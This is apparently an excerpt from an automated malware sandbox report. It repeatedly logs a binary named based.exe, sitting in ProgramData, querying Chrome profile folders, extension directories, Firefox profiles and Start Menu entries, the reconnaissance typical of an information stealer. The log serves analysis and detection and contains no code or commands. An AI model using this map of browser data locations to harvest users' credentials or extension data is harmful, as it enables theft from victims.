Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\af VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\am VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ar VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\az VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\bg VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\bn VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ca VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\cy VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\de VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en_CA VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\et VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\pa VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\sr VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_metadata VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\reports VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crowd Deny VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\3e445a25-c088-46bb-968a-82532b92e486 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\af VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\am VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\az VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\be VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\bg VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ca VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\cs VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\7-Zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\AutoItX VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\de VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_metadata VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CertificateRevocation VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\reports VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crowd Deny VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\3e445a25-c088-46bb-968a-82532b92e486 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\da VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\af VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\am VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\es_419 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\az VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\be VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\bg VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\fi VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fa VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fi VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fil VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_metadata VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ca VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\cs VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\da VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\de VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\el VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\en_GB VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\es VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\hu VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\it VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ko VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\lt VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\pt_BR VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ro VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ru VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\sk VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\sr VolumeInformation	Jump to behavior
